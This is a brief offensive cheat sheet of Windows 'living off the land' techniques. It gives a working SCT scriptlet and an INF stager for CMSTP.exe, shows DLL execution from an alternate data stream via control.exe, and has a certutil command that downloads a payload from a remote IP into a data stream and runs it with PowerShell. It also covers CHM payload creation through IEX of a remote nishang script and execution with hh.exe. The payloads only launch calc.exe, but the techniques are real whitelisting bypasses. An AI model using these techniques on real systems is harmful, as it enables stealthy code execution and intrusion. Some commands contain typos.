sct & chm exploit

Living Off the Lands

CMSTP.exe

  • payload cacl.sct
1
2
3
4
5
6
7
8
9
10
11
12
<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<script language="JScript">
		<![CDATA[
			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");		
		]]>
</script>
</registration>
</scriptlet>
  • stager cmstp.inf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,C:\\calc.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"
  • run
    1
    cmstp.exe /ni s cmstp.inf

Control.exe

  • create dll with msfvenom or custom
  • create Alternate Data Stream (ADS)
1
2
3
C:\Users\IEUser\Documents>echo "demo" > C:\demo\test.txt

C:\Users\IEUser\Documents>type calc.dll > C:\demo\test.txt:calc.dll
  • execute with control.exe

reference

https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-1/

CertUtil

  • function of the command
    • download , encode ,decode
  • download payload and write in data stream
1
certuil -urlcache -sploit -f http://192.168.1.210/certuil.txt C:\demo\test2.txt:certutil
  • payload is simple powershell command
1
start-process calc.exe
  • execute
1
powershell < C:\demo\test2.txt:certuil

hh.exe

  • create help file with the script from nishang
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
PS C:\Users\IEUser> IEX((iwr "https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1")

PS C:\Users\IEUser\Documents> out-chm -Payload "calc" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Microsoft HTML Help Compiler 4.74.8702

Compiling c:\Users\IEUser\Documents\doc.chm


Compile time: 0 minutes, 0 seconds
2       Topics
4       Local links
4       Internet links
0       Graphics


Created c:\Users\IEUser\Documents\doc.chm, 13,422 bytes
  • execute with hh.exe

reference https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/